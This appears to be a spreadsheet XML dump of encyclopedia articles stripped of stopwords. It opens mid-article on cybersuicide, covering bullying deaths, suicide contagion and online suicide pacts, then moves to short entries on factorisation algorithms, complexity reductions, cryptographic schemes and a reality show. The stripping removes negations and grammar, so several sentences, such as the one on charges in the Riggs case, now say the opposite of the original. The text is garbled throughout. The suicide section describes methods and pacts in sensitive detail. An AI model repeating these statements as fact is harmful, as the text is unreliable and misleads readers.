meier hanged bedroom closet following series myspace messages came friend's mother year associate, posed teen named “josh evans” encouraged megan commit suicide. mother, lori drew, faced federal conspiracy charges related computer fraud abuse, later acquitted.in 2012, canadian high school student amanda todd hanged blackmailed stalker, suffering repeated cyberbulling harassment school. september todd posted 9-minute youtube video titled story: struggling, bullying, suicide, self-harm, showed using series flashcards tell experiences bullied. video went viral death october 2012, receiving 1,600,000 views october 2012, news websites around world linking it.in 2014, conrad killed exchanging numerous text messages michelle carter, long-distance girlfriend, repeatedly encouraged commit suicide. found guilty involuntary manslaughter, sentenced months prison. carter released january 2020.sadie riggs, pennsylvania teen, killed 2015 allegedly online bullying harassment school appearance. sadie's aunt, sarah smith, contacted various social media companies, police, sadie's school hopes make bullying stop. desperation, smith went break sadie's phone, presence, attempt stop bullying. charges ever filed alleged suspect.in 2018 florida case, preteens arrested charged cyberstalking accused cyberbullying another female middle school student, year gabriella green. online rumors spread her, hanged immediately call abusers, told going ended call, according police.in 2019, canadian inuk singer kelly fraser, popular inuktitut language covers songs, found dead home near winnipeg, manitoba. death ruled suicide, fraser's family attributed "childhood traumas, racism, persistent cyberbullying." media contagion effect suicide contagion viewed within larger context behavioral contagion, described situation behavior spreads quickly spontaneously group. persons susceptible suicide contagions years age. recent study dunlop specifically examined possible contagion effects suicidal behavior internet social media. individuals aged years, reported exposed suicide-related content family, friends, traditional news media newspapers, found content internet sources. these information pose hazard vulnerable groups influencing decisions suicide. particular, interactions chat rooms discussion forums foster peer pressure suicide, encourage users idolize died suicide, facilitate suicide pacts. recently trend creating memorial social media pages honor deceased person. zealand, memorial page made person committed suicide, resulted suicide persons thereafter, shows power media contagion effect. south korea study demonstrated social media data used predict national suicide numbers. suicide notes generally found post suicide notes online tend receive help.several notable cases support argument: kevin whitrick abraham biggs webcast suicides. going leave whoever stumbles across bookmarks later on." paul zolezzi indicated facebook update intent commit suicide. 2010, john patrick bedell left wikipedia user page youtube videos interpreted suicide note; former deleted wikipedia administrators. stack also posted suicide note online. chris mckinstry, researcher, committed suicide posting note blog joel software off-topic forum explaining reasons demise. girl attended louisville-area high school posted video suicide note killed back 2014. girl receive help prior suicide, leading eric sparks, director american school counselor association, troubled students directed help hotlines trusted authorities seek intervention quickly possible. suicide pacts suicide pact agreement people suicide particular time often lethal means. suicide pacts found rare. traditional suicide pacts typically developed among individuals know other, couple friends. suicide pact formed developed internet cyber suicide pact. primary difference cybersuicide pacts traditional suicide pacts pacts usually formed among strangers. they online chat rooms virtual bulletin boards forums unmediated avenue share feelings like-minded individuals, easier talking thoughts feelings person.the first documented internet form suicide pact reported japan 2000. become common form suicide japan, suicide rate increased suicides 2003 suicides 2005. south korea world's highest suicide rates (24.7/100 2005), evidence exists cyber suicide pacts account almost one-third suicides country. suicide pacts also united states. april 2018, macon middle school, middle school north carolina, became aware group social media called "edgy" "edgy page 101" group came suicide pact suicide ideations. middle school contacted parents informed look children's social media pages talk dangers group like this.gerald krein william francis melchert-dinkel accused arranging internet suicide pacts. interventions suicide intervention social media saved many lives twitter, instagram, facebook. aforementioned companies slightly different ways report posts seem suicidal. facebook facebook, assisted among handful experts, reidenburg suicide awareness voices education—"uses algorithm track buzzwords phrases commonly associated suicide" intervened 3,500 cases, according company reports. algorithm reportedly tracks buzzwords phrases associated suicide alert sent facebook's safety center. "the technology isn’t going send somebody house. person facebook would that…" –dr. reidenburg twitter demi moore followers intervened stop suicide announced twitter. twitter followers chicago rapper cupcakke alerted authorities rapper posted ominous phrases onto twitter. later thanked followers receiving help. forums german prevented killing spanish internet users announcing decision. discussion support groups some online groups, alt.suicide.holiday, emerged discussion support groups suicidal individuals. research indicates providing online support suicidal people would effective shutting pro-suicide websites. defense centers excellence expressed interest using social media suicide prevention. facebook groups sometimes suicide prevention purposes, including attracted 47,000 members. although many teens preteens encounter suicide-related posts peers different social media apps, also encounter suicide prevention hotlines website links well.samhsa's suicide prevention lifeline operates twitter, facebook, youtube. american foundation suicide prevention trying understanding preventing suicide research, education, advocacy. reidenberg, executive director united states-based prevention organization suicide awareness voices education (save), become involved responding suicidal messages. facebook, world's largest social network, implemented direct intervention method. american states, user posts message facebook containing phrase algorithms flag indicating suicidal thoughts intentions, banner pops user's page. user's page flagged user provided number national suicide prevention lifeline given tips links support videos aligned best prevention practices. suicide still worldwide problem today social media help. also blue whale (game) death internet instagram's impact people momo challenge suicide internet virtual crime references further reading luxton, david june, jennifer fairall, jonathan (2012-5). "social media suicide: public health perspective". american journal public health. 102(suppl s195–s200. doi:10.2105/ajph.2011.300608. issn 0090-0036. 3477910. pmid 22401525.&lt;/ref&gt; hawton, (2002-12-14). "influences media suicide". bmj. (7377): 1374–1375. doi:10.1136/bmj.325.7377.1374. 1124845. pmid 12480830. liu, xingyun; huang, jiasheng; nancy xiaonan; qing; zhu, tingshao (2020-04-28). "mediation effect suicide-related social media behaviors association between suicidal ideation suicide attempt: cross-sectional questionnaire study". journal medical internet research. (4): e14940. doi:10.2196/14940. issn 1438-8871.</t>
  </si>
  <si>
    <t>Anne P. Mitchell</t>
  </si>
  <si>
    <t>anne mitchell (born april 1958) attorney, professor law, founder institute social internet public policy. biography 1988, mitchell founded early fathers' rights group buffalo, york, studying pre-law suny buffalo. upon moving california attend stanford school founded first fathers' rights student housing. after graduating stanford, mitchell opened fathers' rights practice, represented fathers wishing remain involved lives children following divorce. spoke publicly privately issues fathers' rights need children fathers involved lives. mitchell spoke, invitation, california judges' bench beyond bench program, santa clara family court services, governor pete wilson's "focus fathers summit. television show 1997, mitchell produced host cable show "fathers parents too". half-hour television talk show "focused concerns, issues, realities related becoming staying involved father." thirty-six episodes "fathers parents too" filmed 1997, shown cable television stations throughout united states. anti-spam internet 1998, mitchell closed fathers' rights practice, changed focus internet anti-spam efforts. joined mail abuse prevention system (maps), first formal anti-spam organization, director legal public affairs. while maps mitchell strategy first anti-spam lawsuits.in 2002 mitchell stepped co-founder newly created habeas. year later mitchell left habeas found institute spam internet public policy (isipp),during tenure habeas, mitchell coined term "deliverability" founded first email deliverability summits, became impetus founding isipp left habeas. philanthropy september 2005, mitchell founded auction help victims hurricane katrina, enlisting donated items friends colleagues kawasaki, béla fleck, warren farrell, anne fadiman, eduardo sánchez harold evans, raise $5,000. originally auction created using ebay's "giving works" platform, mitchell later criticized. selected works mitchell published many papers authored ebook. mitchell, anne (2011). they're your kids too: single father's guide defending your fatherhood broken family system. isipp press. mitchell, anne (2006). email deliverability handbook. isipp press. mitchell, anne (august 2004). "don't spoofer ruin your good name". clickz. retrieved july 2009. mitchell, anne (2003). "vendor liability advertising unsolicited commercial e-mail". john marshall journal computer information law. xxii (fall 2003). oclc 97971978. archived original 2009-09-09. mitchell, anne (2000). "chapter legal support father-child relationships disunited families". fagan, jay; hawkins, alan (eds.). clinical educational interventions fathers. haworth press. isbn 978-0-7890-1238-8. mitchell, anne (1994). "the hypocrisy equality family context". fathers' rights equality exchange. oclc 30726283. mitchell, anne (1992). "the maternal bond". fathers' rights equality exchange. oclc 30741319. references external links institute social internet public policy dadsrights.org habeas auction dushanbe relief fund</t>
  </si>
  <si>
    <t>High-resolution high-definition</t>
  </si>
  <si>
    <t>hrhd (high-resolution high-definition) (also hrhdtv, hr.hdtv) initialism referring image resolution derived high-definition video, often seen part filename shows shared internet. hrhd unofficial standard encoding video, meaning video signal ripped directly hdtv broadcast, downsampled approximately 540, usually encoded xvid. while horizontal resolution remains constant vertical resolution fluctuate provide clean cropping. sometimes erroneously referred half-resolution high-definition. encoding 40–55-minute hrhd show approximately size compact disc. contains original sound, often channels, instead re-encoded stereo stream found 350mb releases. history hrhd format began late 2003 capture group began distributing termed "hrhdtv rips" private sites scene. group defined hrhdtv .nfo, small text file included releases give information specific release. there often misconception name. some mistakenly think term means half-resolution high-definition. hrhd resolution actually height width 720p video. area, picture 56.25% typical 720p broadcast. hrhd dimensions precisely half 1080p video, yields original 1080p picture information. also pirated movie release types standard (warez) references</t>
  </si>
  <si>
    <t>L-reduction</t>
  </si>
  <si>
    <t>computer science, particularly study approximation algorithms, l-reduction ("linear reduction") transformation optimization problems linearly preserves approximability features; type approximation-preserving reduction. l-reductions studies approximability optimization problems play similar role polynomial reductions studies computational complexity decision problems. term reduction sometimes used refer log-space reductions, analogy complexity class different concept. definition optimization problems respective cost functions. pair functions l-reduction following conditions met: functions computable polynomial time, instance problem f(x) instance problem solution f(x), g(y' solution exists positive constant {\displaystyle \mathrm {opt_{b}} (f(x))\leq \alpha \mathrm {opt_{a}} (x)} ,there exists positive constant every solution f(x) {\displaystyle |\mathrm {opt_{a}} (x)-c_{a}(g(y'))|\leq \beta |\mathrm {opt_{b}} (f(x))-c_{b}(y')|} properties implication ptas reduction l-reduction problem problem implies ap-reduction minimization problems ptas reduction maximization problems. cases, ptas l-reduction also ptas. this enables l-reduction replacement showing existence ptas-reduction; crescenzi suggested natural formulation l-reduction actually useful many cases ease usage. proof (minimization case) approximation ratio {\displaystyle 1+\delta begin approximation ratio {\displaystyle {\frac {c_{a}(y)}{\mathrm {opt} _{a}(x)}}} remove absolute values around third condition l-reduction definition since know minimization problems. substitute condition obtain {\displaystyle {\frac {c_{a}(y)}{\mathrm {opt} _{a}(x)}}\leq {\frac {\mathrm {opt} _{a}(x)+\beta (c_{b}(y')-\mathrm {opt} _{b}(x'))}{\mathrm {opt} _{a}(x)}}} simplifying, substituting first condition, {\displaystyle {\frac {c_{a}(y)}{\mathrm {opt} _{a}(x)}}\leq 1+\alpha \beta \left({\frac {c_{b}(y')-\mathrm {opt} _{b}(x')}{\mathrm {opt} _{b}(x')}}\right)} term parentheses right-hand side actually equals {\displaystyle \delta thus, approximation ratio {\displaystyle 1+\alpha \beta \delta this meets conditions ap-reduction. proof (maximization case) approximation ratio {\displaystyle {\frac {1}{1-\delta '}}} begin approximation ratio {\displaystyle {\frac {c_{a}(y)}{\mathrm {opt} _{a}(x)}}} remove absolute values around third condition l-reduction definition since know maximization problems. substitute condition obtain {\displaystyle {\frac {c_{a}(y)}{\mathrm {opt} _{a}(x)}}\geq {\frac {\mathrm {opt} _{a}(x)-\beta (c_{b}(y')-\mathrm {opt} _{b}(x'))}{\mathrm {opt} _{a}(x)}}} simplifying, substituting first condition, {\displaystyle {\frac {c_{a}(y)}{\mathrm {opt} _{a}(x)}}\geq 1-\alpha \beta \left({\frac {c_{b}(y')-\mathrm {opt} _{b}(x')}{\mathrm {opt} _{b}(x')}}\right)} term parentheses right-hand side actually equals {\displaystyle \delta thus, approximation ratio {\displaystyle {\frac {1}{1-\alpha \beta \delta '}}} {\displaystyle {\frac {1}{1-\alpha \beta \delta '}}=1+\epsilon {\displaystyle {\frac {1}{1-\delta '}}=1+{\frac {\epsilon }{\alpha \beta (1+\epsilon )-\epsilon meets requirements ptas reduction ap-reduction. other properties l-reductions also imply p-reduction. deduce l-reductions imply ptas reductions fact fact p-reductions imply ptas reductions. l-reductions preserve membership minimizing case only, result implying ap-reductions. examples dominating set: example token reconfiguration: example 1/5, also maxsnp approximation-preserving reduction ptas reduction references ausiello, crescenzi, gambosi, kann, marchetti-spaccamela, protasi. complexity approximation. combinatorial optimization problems approximability properties. 1999, springer. isbn 3-540-65431-3</t>
  </si>
  <si>
    <t>Algebraic-group factorisation algorithm</t>
  </si>
  <si>
    <t>algebraic-group factorisation algorithms algorithms factoring integer working algebraic group defined modulo whose group structure direct 'reduced groups' obtained performing equations defining group arithmetic modulo unknown prime factors chinese remainder theorem, arithmetic modulo corresponds arithmetic reduced groups simultaneously. find element identity group modulo identity modulo factors, method recognising one-sided identities required. general, finds performing operations move elements around leave identities reduced groups unchanged. once algorithm finds one-sided identity future terms also one-sided identities, checking periodically suffices. computation proceeds picking arbitrary element group modulo computing large smooth multiple order least reduced groups divisor yields factorisation. need prime factorisation, element might identity reduced groups. generally, taken product primes limit computed successive multiplication primes; multiplication, every multiplications, check made one-sided identity. two-step procedure often possible multiply group element several small integers quickly product, generally difference-based methods; calculates differences consecutive primes adds consecutively {\displaystyle d_{i}r} this means two-step procedure becomes sensible, first computing multiplying primes limit examining primes larger limit methods corresponding particular algebraic groups algebraic group multiplicative group one-sided identities recognised computing greatest common divisors result method. algebraic group multiplicative group quadratic extension result method; calculation involves pairs numbers modulo possible tell whether {\displaystyle \mathbb /n\mathbb [{\sqrt {t}}]} actually quadratic extension {\displaystyle \mathbb /n\mathbb without knowing factorisation this requires knowing whether quadratic residue modulo known methods without knowledge factorisation. however, provided large number factors, case another method used first, picking random rather picking accidentally quadratic non-residue fairly quickly. quadratic residue, method degenerates slower form method. algebraic group elliptic curve, one-sided identities recognised failure inversion elliptic-curve point addition procedure, result elliptic curve method; hasse's theorem states number points elliptic curve modulo always within {\displaystyle 2{\sqrt {p}}} three algebraic groups used gmp-ecm package, includes efficient implementations two-stage procedure, implementation prac group-exponentiation algorithm rather efficient standard binary exponentiation approach. algebraic groups—higher-order extensions groups corresponding algebraic curves higher genus—is occasionally proposed, almost always impractical. these methods smoothness constraints numbers order much less likely smooth numbers order</t>
  </si>
  <si>
    <t>Williams's p + 1 algorithm</t>
  </si>
  <si>
    <t>computational number theory, williams's algorithm integer factorization algorithm, family algebraic-group factorisation algorithms. invented hugh williams 1982. works well number factored contains prime factors smooth, i.e. contains small factors. uses lucas sequences perform exponentiation quadratic field. analogous pollard's algorithm. algorithm choose integer greater characterizes lucas sequence: {\displaystyle v_{0}=2,v_{1}=a,v_{j}=av_{j-1}-v_{j-2}} operations performed modulo then prime divides {\displaystyle \gcd(n,v_{m}-2)} whenever multiple {\displaystyle p-(d/p)} {\displaystyle d=a^{2}-4} {\displaystyle (d/p)} jacobi symbol. require {\displaystyle (d/p)=-1} quadratic non-residue modulo know beforehand, value required finding solution. {\displaystyle (d/p)=+1} algorithm degenerates slow version pollard's algorithm. different values calculate {\displaystyle \gcd(n,v_{m}-2)} result equal found non-trivial factor values used successive factorials, {\displaystyle v_{m}} m-th value sequence characterized {\displaystyle v_{m-1}} find m-th element sequence characterized proceed manner similar left-to-right exponentiation: right significant else example with n=112729 a=5, successive values {\displaystyle v_{m}} are: seq(5) seq(5) seq(5) seq(5) 23v3 seq(23) seq(5) 12098v4 seq(12098) seq(5) 87680v5 seq(87680) seq(5) 53242v6 seq(53242) seq(5) 27666v7 seq(27666) seq(5) 110229.at point, gcd(110229-2,112729) 139, non-trivial factor 112729. notice number lowest factorial multiple 140, proper factor found step. using another initial value, get: seq(9) seq(9) seq(9) seq(9) 79v3 seq(79) seq(9) 41886v4 seq(41886) seq(9) 79378v5 seq(79378) seq(9) 1934v6 seq(1934) seq(9) 10582v7 seq(10582) seq(9) 84241v8 seq(84241) seq(9) 93973v9 seq(93973) seq(9) 91645.at point gcd(91645-2,112729) 811, non-trivial factor 112729. notice number lowest factorial multiple 810, proper factor found step. factor found time divisor seen examples know advance whether prime found smooth p−1. generalization based pollard's williams's factoring algorithms, eric bach jeffrey shallit developed techniques factor efficiently provided prime factor cyclotomic polynomial φk(p) smooth. first cyclotomic polynomials given sequence φ1(p) p−1, φ2(p) p+1, φ3(p) p2+p+1, φ4(p) p2+1. references williams, (1982), method factoring", mathematics computation, (159): 225–234, doi:10.2307/2007633, 0658227 external links factorization method prime wiki</t>
  </si>
  <si>
    <t>Sparse graph code</t>
  </si>
  <si>
    <t>sparse graph code code represented sparse graph. linear code represented graph, sets nodes representing transmitted bits another representing constraints transmitted bits satisfy. state classical error-correcting codes based sparse graphs, achieving close shannon limit. archetypal sparse-graph codes gallager's low-density parity-check codes. external links on-line textbook: information theory, inference, learning algorithms, david j.c. mackay, discusses sparse-graph codes chapters 47–50. encyclopedia sparse graph codes iterative error correction: turbo, low-density parity-check, repeat-cccumulate codes</t>
  </si>
  <si>
    <t>Log-space reduction</t>
  </si>
  <si>
    <t>computational complexity theory, log-space reduction reduction computable deterministic turing machine using logarithmic space. conceptually, means keep constant number pointers input, along logarithmic number fixed-size integers. possible machine space write output, requirement given output computable log-space. formally, reduction executed log-space transducer. such machine polynomially-many configurations, log-space reductions also polynomial-time reductions. however, log-space reductions probably weaker polynomial-time reductions; non-empty, non-full language polynomial-time reducible non-empty, non-full language log-space reduction nl-complete language language would languages would imply unlikely open question np-complete problems different respect log-space polynomial-time reductions. log-space reductions normally used languages case usually matter whether many-one reductions turing reductions used, since verified closed turing reductions, meaning turing reductions used show problem classes. however, subclasses closed turing reductions, many-one reductions must used. just polynomial-time reductions useless within subclasses, log-space reductions useless distinguish problems subclasses; particular, every non-empty, non-full problem trivially l-complete log-space reductions. while even weaker reductions exist, often used practice, complexity classes smaller (that strictly contained thought strictly contained receive relatively little attention. tools available designers log-space reductions greatly expanded result list sl-complete problems used subroutines log-space reductions. notes references arora, sanjeev; barak, boaz (2009). computational complexity. modern approach. cambridge university press. isbn 978-0-521-42426-4. 1193.68112. further reading papadimitriou, christos (1994). "chapter reductions completeness". computational complexity (1st ed.). addison wesley. 159–180. isbn 0-201-53082-1. 0833.68049.</t>
  </si>
  <si>
    <t>Socialist millionaire problem</t>
  </si>
  <si>
    <t>cryptography, socialist millionaire problem millionaires want determine wealth equal without disclosing information riches other. variant millionaire's problem whereby millionaires wish compare riches determine wealth without disclosing information riches other. often used cryptographic protocol allows parties verify identity remote party shared secret, avoiding man-in-the-middle attack without inconvenience manually comparing public fingerprints outside channel. effect, relatively weak password/passphrase natural language used. motivation alice secret values {\displaystyle {\displaystyle respectively. alice wish learn {\displaystyle x=y} without allowing either party learn anything else other's secret value. passive attacker simply spying messages alice exchange learns nothing {\displaystyle {\displaystyle even whether {\displaystyle x=y} even parties dishonest deviates protocol, person cannot learn anything {\displaystyle x=y} active attacker capable arbitrarily interfering alice bob's communication man-in-the-middle) cannot learn passive attacker cannot affect outcome protocol make fail. therefore, protocol used authenticate whether parties secret information. popular instant message cryptography package off-the-record messaging uses socialist millionaire protocol authentication, secrets {\displaystyle {\displaystyle contain information parties' long-term authentication public keys well information entered users themselves. off-the-record messaging protocol protocol based group theory. group prime order {\displaystyle generator {\displaystyle agreed upon priori, practice generally fixed given implementation. example, off-the-record messaging protocol, {\displaystyle specific fixed 1,536-bit prime. {\displaystyle generator prime-order subgroup {\displaystyle (\mathbb /p\mathbb )^{*}} operations performed modulo {\displaystyle words, subgroup multiplicative group, {\displaystyle (\mathbb /p\mathbb )^{*}} {\displaystyle \langle h|a,\,b\rangle denote secure multiparty computation, diffie–hellman–merkle exchange, which, integers, {\displaystyle {\displaystyle returns {\displaystyle h^{ab}} party: alice calculates {\displaystyle h^{a}} sends bob, calculates {\displaystyle \left(h^{a}\right)^{b}\equiv h^{ab}} calculates {\displaystyle h^{b}} sends alice, calculates {\displaystyle \left(h^{b}\right)^{a}\equiv h^{ba}} {\displaystyle h^{ab}\equiv h^{ba}} multiplication {\displaystyle (\mathbb /p\mathbb )^{*}} associative. note procedure insecure man-in-the-middle attacks. socialist millionaire protocol steps part procedure, security relies difficulty discrete logarithm problem, does. sent values also include zero-knowledge proofs generated according protocol. part security also relies random secrets. however, written below, protocol vulnerable poisoning alice chooses {\displaystyle {\displaystyle {\displaystyle \alpha {\displaystyle \beta zero. solve problem, party must check diffie-hellman exchanges none {\displaystyle h^{a}} {\displaystyle h^{b}} {\displaystyle h^{\alpha {\displaystyle h^{\beta receive equal also necessary check {\displaystyle p_{a}\neq p_{b}} {\displaystyle q_{a}\neq q_{b}} note that: {\displaystyle {\begin{aligned}p_{a}{p_{b}}^{-1}&amp;=\gamma ^{r}\gamma ^{-s}=\gamma ^{r-s}\\&amp;=h^{\alpha \beta (r-s)}\end{aligned}}} therefore {\displaystyle {\begin{aligned}c&amp;=\left(q_{a}q_{b}^{-1}\right)^{\alpha \beta }\\&amp;=\left(h^{r}g^{x}h^{-s}g^{-y}\right)^{\alpha \beta }=\left(h^{r-s}g^{x-y}\right)^{\alpha \beta }\\&amp;=\left(h^{r-s}h^{ab(x-y)}\right)^{\alpha \beta }=h^{\alpha \beta (r-s)}h^{\alpha \beta ab(x-y)}\\&amp;=\left(p_{a}{p_{b}}^{-1}\right)h^{\alpha \beta ab(x-y)}\end{aligned}}} .because random values stored secret party, neither party force {\displaystyle {\displaystyle p_{a}{p_{b}}^{-1}} equal unless {\displaystyle equals {\displaystyle case {\displaystyle h^{\alpha \beta ab(x-y)}=h^{0}=1} this proves correctness. also zero-knowledge proof references external links description otr-messaging protocol version socialist millionaire problem explain like five goldbug messenger, uses implementation socialist millionaire protocol</t>
  </si>
  <si>
    <t>GGH encryption scheme</t>
  </si>
  <si>
    <t>goldreich–goldwasser–halevi (ggh) lattice-based cryptosystem asymmetric cryptosystem based lattices. there also signature scheme. goldreich–goldwasser–halevi (ggh) cryptosystem makes fact closest vector problem hard problem. this system published 1997 oded goldreich, shafi goldwasser, shai halevi, uses trapdoor one-way function relies difficulty lattice reduction. idea included trapdoor function that, given basis lattice, easy generate vector close lattice point, example taking lattice point adding small error vector. return erroneous vector original lattice point special basis needed. encryption scheme cryptanalyzed 1999 phong nguyen. operation involves private public key. private basis {\displaystyle lattice {\displaystyle good properties (such short nearly orthogonal vectors) unimodular matrix {\displaystyle public another basis lattice {\displaystyle form {\displaystyle b'=ub} chosen message space consists vector {\displaystyle (m_{1},...,m_{n})} range {\displaystyle -m&lt;m_{i}&lt;m} encryption given message {\displaystyle m=(m_{1},...,m_{n})} error {\displaystyle public {\displaystyle compute {\displaystyle v=\sum m_{i}b_{i}'} matrix notation {\displaystyle v=m\cdot .remember {\displaystyle consists integer values, {\displaystyle lattice point, also lattice point. ciphertext {\displaystyle c=v+e=m\cdot b'+e} decryption decrypt cyphertext computes {\displaystyle c\cdot b^{-1}=(m\cdot b^{\prime }+e)b^{-1}=m\cdot u\cdot b\cdot b^{-1}+e\cdot b^{-1}=m\cdot u+e\cdot b^{-1}} babai rounding technique used remove term {\displaystyle e\cdot b^{-1}} long small enough. finally compute {\displaystyle m=m\cdot u\cdot u^{-1}} messagetext. example {\displaystyle l\subset \mathbb ^{2}} lattice basis {\displaystyle inverse {\displaystyle b^{-1}} {\displaystyle b={\begin{pmatrix}7&amp;0\\0&amp;3\\\end{pmatrix}}} {\displaystyle b^{-1}={\begin{pmatrix}{\frac {1}{7}}&amp;0\\0&amp;{\frac {1}{3}}\\\end{pmatrix}}} with {\displaystyle u={\begin{pmatrix}2&amp;3\\3&amp;5\\\end{pmatrix}}} {\displaystyle u^{-1}={\begin{pmatrix}5&amp;-3\\-3&amp;2\\\end{pmatrix}}} gives {\displaystyle b'=ub={\begin{pmatrix}14&amp;9\\21&amp;15\\\end{pmatrix}}} message {\displaystyle m=(3,-7)} error vector {\displaystyle e=(1,-1)} then ciphertext {\displaystyle c=mb'+e=(-104,-79).\,} decrypt must compute {\displaystyle cb^{-1}=\left({\frac {-104}{7}},{\frac {-79}{3}}\right).} this rounded {\displaystyle (-15,-26)} message recovered {\displaystyle m=(-15,-26)u^{-1}=(3,-7).\,} security scheme 1999 nguyen showed crypto conference encryption scheme flaw design schemes. nguyen showed every ciphertext reveals information plaintext problem decryption could turned special closest vector problem much easier solve general cvp. references uth, max. benezit dictionary artists. oxford university press. 2011-10-31. doi:10.1093/benz/9780199773787.article.b00187394. bibliography goldreich, oded; goldwasser, shafi; halevi, shai (1997). "public-key cryptosystems lattice reduction problems". crypto '97: proceedings 17th annual international cryptology conference advances cryptology. london: springer-verlag. 112–131. nguyen, phong (1999). "cryptanalysis goldreich–goldwasser–halevi cryptosystem crypto '97". crypto '99: proceedings 19th annual international cryptology conference advances cryptology. london: springer-verlag. 288–304.</t>
  </si>
  <si>
    <t>Maximum likelihood sequence estimation</t>
  </si>
  <si>
    <t>maximum likelihood sequence estimation (mlse) mathematical algorithm extract useful data noisy data stream. theory optimized detector digital signals priority reconstruct transmitter signal, best estimation transmitted data least possible number errors. receiver emulates distorted channel. possible transmitted data streams distorted channel model. receiver compares time response actual received signal determines likely signal. cases computationally straightforward, root mean square deviation used decision criterion lowest error probability. background suppose underlying signal {x(t)}, observed signal {r(t)} available. observed signal related transformation nonlinear involve attenuation, would usually involve incorporation random noise. statistical parameters transformation assumed known. problem solved observations {r(t)} create good estimate {x(t)}. maximum likelihood sequence estimation formally application maximum likelihood problem. that estimate {x(t)} defined sequence values maximize functional {\displaystyle l(x)=p(r\mid x),} denotes conditional joint probability density function observed series {r(t)} given underlying series values {x(t)}. contrast, related method maximum posteriori estimation formally application maximum posteriori (map) estimation approach. this complex maximum likelihood sequence estimation requires known distribution bayesian terms, prior distribution) underlying signal. case estimate {x(t)} defined sequence values maximize functional {\displaystyle p(x)=p(x\mid r),} denotes conditional joint probability density function underlying series {x(t)} given observed series taken values {r(t)}. bayes' theorem implies {\displaystyle p(x)=p(x\mid r)={\frac {p(r\mid x)p(x)}{p(r)}}.} cases contribution random noise additive multivariate normal distribution, problem maximum likelihood sequence estimation reduced least squares minimization. also maximum-likelihood estimation partial-response maximum-likelihood references further reading andrea goldsmith (2005). "maximum likelihood sequence estimation". wireless communications. cambridge university press. 362–364. isbn 9780521837163. philip golden; hervé dedieu krista jacobsen (2006). fundamentals technology. press. 319–321. isbn 9780849319136. crivelli, carrer, hueda, (2005) "performance evaluation maximum likelihood sequence estimation receivers lightwave systems optical amplifiers", latin american applied research, (2), 95–98. katz, sadot, mahlab, levy, a.(2008) "channel estimators maximum-likelihood sequence estimation direct-detection optical communications", optical engineering (4), 045003. doi:10.1117/1.2904827 external links sauer-greff; dittrich; lorang siegrist (2001-04-16). "maximum-likelihood sequence estimation nonlinear channels high-speed optical fiber systems" (pdf). telecommunications research center vienna. archived original (pdf) 2012-03-11. retrieved 2010-09-02.</t>
  </si>
  <si>
    <t>America's Greatest Makers</t>
  </si>
  <si>
    <t>america's greatest makers reality show aired 2016 tbs. twenty-four teams makers competed million prize judging panel consisted intel brian krzanich, kevin pereira, carol roth. produced emmy-award winning producer mark burnett television. second season announced 2017 canceled soon casting.guest judges included: kenny smith, mayim bialik, shaquille o'neal, massimo banzi mike rowe. show also in-depth second screen presence website video segments hosted cara santa maria guest correspondent chris hardwick nerdist. show included teams design, hardware software mentors. design mentors included: imaan naeem, aubrey shick, kurin mechanical/hardware mentors included: nahid alam, shallu bhalla, james crocker, norvin cuentas, alex juern greg spilman. software mentors included: oliver chen, michael digioia, mike duong, david fickel, hugo, bryan levin, pirooz najafi, prem seelin. anubha sacheti team grush show. season teams, inventions eliminations season episodes episode series premiere aired april 2016 tbs. aired pdt/edt (8pm central). episode part featuring teams makers presented inventions judges guest judge kenny smith. teams, eliminated leaving spots open next teams would present inventions episode episode this episode aired april 2016 continuation episode final teams presented ideas judges guest judge kenny smith. teams eliminated. this meant teams moving onto "make break" round. stage teams compete groups three, $100,000 line every week winning team. after five weeks round, finalists make final round chance $1,000,000 episode episode first round "make break" stage, aired april 2016. mayim bialik guest judge. venn telekinesis eliminated, grush, smart toothbrush, round moved finals. episode second round "make break" stage aired april 2016. massimo banzi, cofounder arduino, guest judge. aseah's delta glove automatically identifies tracks kind exercise user performs round $100,000, moved finals. withme tabor eliminated. episode third "make break" round, team nwtn competed herddogg slapband, walked away winner. show aired 3rd, 2016. episode fourth "make break" round aired 10th, 2016. shaquille o'neal guest judge. episode pitted aurora dreamphones, powerbobber motivateme other. powerbobber round $100,000, joined nwtn, grush aseah finals. episode fifth final "make break" round aired 17th, 2016, shaquille o'neal guest judge. final winner stage team handson, beat zackees fashion glow jewelry collarator, advanced last contender final round. episode episode finale first season. aired 24th, 2016. finale, winners previous 'make break' rounds grush, nwtn, aseah, powerbobber handson competed grand prize $1,000,000 dollars. teams presented inventions last time panel judges, included special judges kenny smith mike rowe. winner season one's grand prize grush. team grush- anubha sacheti, ethan schur yong jing wang. references</t>
  </si>
  <si>
    <t>Hill cipher</t>
  </si>
  <si>
    <t>classical cryptography, hill cipher polygraphic substitution cipher based linear algebra. invented lester hill 1929, first polygraphic cipher practical (though barely) operate three symbols once. following discussion assumes elementary knowledge matrices. encryption each letter represented number modulo though essential feature cipher, simple scheme often used: encrypt message, block letters (considered n-component vector) multiplied invertible matrix, modulus decrypt message, block multiplied inverse matrix used encryption. matrix used encryption cipher key, chosen randomly invertible matrices (modulo 26). cipher can, course, adapted alphabet number letters; arithmetic needs done modulo number letters instead modulo consider message 'act', gyb/nqk/urp letters): {\displaystyle {\begin{pmatrix}6&amp;24&amp;1\\13&amp;16&amp;10\\20&amp;17&amp;15\end{pmatrix}}} since message vector: {\displaystyle {\begin{pmatrix}0\\2\\19\end{pmatrix}}} thus enciphered vector given {\displaystyle {\begin{pmatrix}6&amp;24&amp;1\\13&amp;16&amp;10\\20&amp;17&amp;15\end{pmatrix}}{\begin{pmatrix}0\\2\\19\end{pmatrix}}={\begin{pmatrix}67\\222\\319\end{pmatrix}}\equiv {\begin{pmatrix}15\\14\\7\end{pmatrix}}{\pmod {26}}} corresponds ciphertext 'poh'. now, suppose message instead 'cat', {\displaystyle {\begin{pmatrix}2\\0\\19\end{pmatrix}}} this time, enciphered vector given {\displaystyle {\begin{pmatrix}6&amp;24&amp;1\\13&amp;16&amp;10\\20&amp;17&amp;15\end{pmatrix}}{\begin{pmatrix}2\\0\\19\end{pmatrix}}={\begin{pmatrix}31\\216\\325\end{pmatrix}}\equiv {\begin{pmatrix}5\\8\\13\end{pmatrix}}{\pmod {26}}} corresponds ciphertext 'fin'. every letter changed. hill cipher achieved shannon's diffusion, n-dimensional hill cipher diffuse fully across symbols once. decryption order decrypt, turn ciphertext back vector, simply multiply inverse matrix matrix (ifk/viv/vmi letters). find that, modulo inverse matrix used previous example {\displaystyle {\begin{pmatrix}6&amp;24&amp;1\\13&amp;16&amp;10\\20&amp;17&amp;15\end{pmatrix}}^{-1}{\pmod {26}}\equiv 